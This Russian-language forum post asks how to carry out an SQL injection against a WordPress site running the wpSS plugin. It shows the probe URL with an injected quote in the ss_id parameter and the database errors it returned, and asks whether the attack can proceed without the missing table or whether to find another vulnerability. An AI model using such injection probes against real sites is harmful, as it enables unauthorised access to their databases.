Может кто пнет в нужном направлении!!! - есть сайт на wordpress 2.0(php 5.4.4) c установленным плагином wpSS (
www.securityfocus.com/bid/28894/exploit), использовал запрос следующего вида - wp-content/plugins/wpSS/ss_handler.php?display=0&edit=&ss_id=1%27", однако при попытке провести SQL инжект приходят ошибки от wordpress. волнует сообщение которое сообщает об отсутствии таблицы(выделено красным)
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1]
SELECT * FROM wp_spreadsheet WHERE id='1'"'
WordPress database error: [Table 'wordpress.wp_spreadsheet' doesn't exist]
INSERT INTO wp_spreadsheet (ss_tablehtml, ss_name, ss_description) VALUES ('
', 'New', 'Blank spreadsheet');
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"' at line 1]
SELECT * FROM wp_spreadsheet WHERE id = 1'";
В связи с этим вопрос гуру SQL - возможно ли провести полноценный инжект без данной таблицы, или искать новую уязвимость?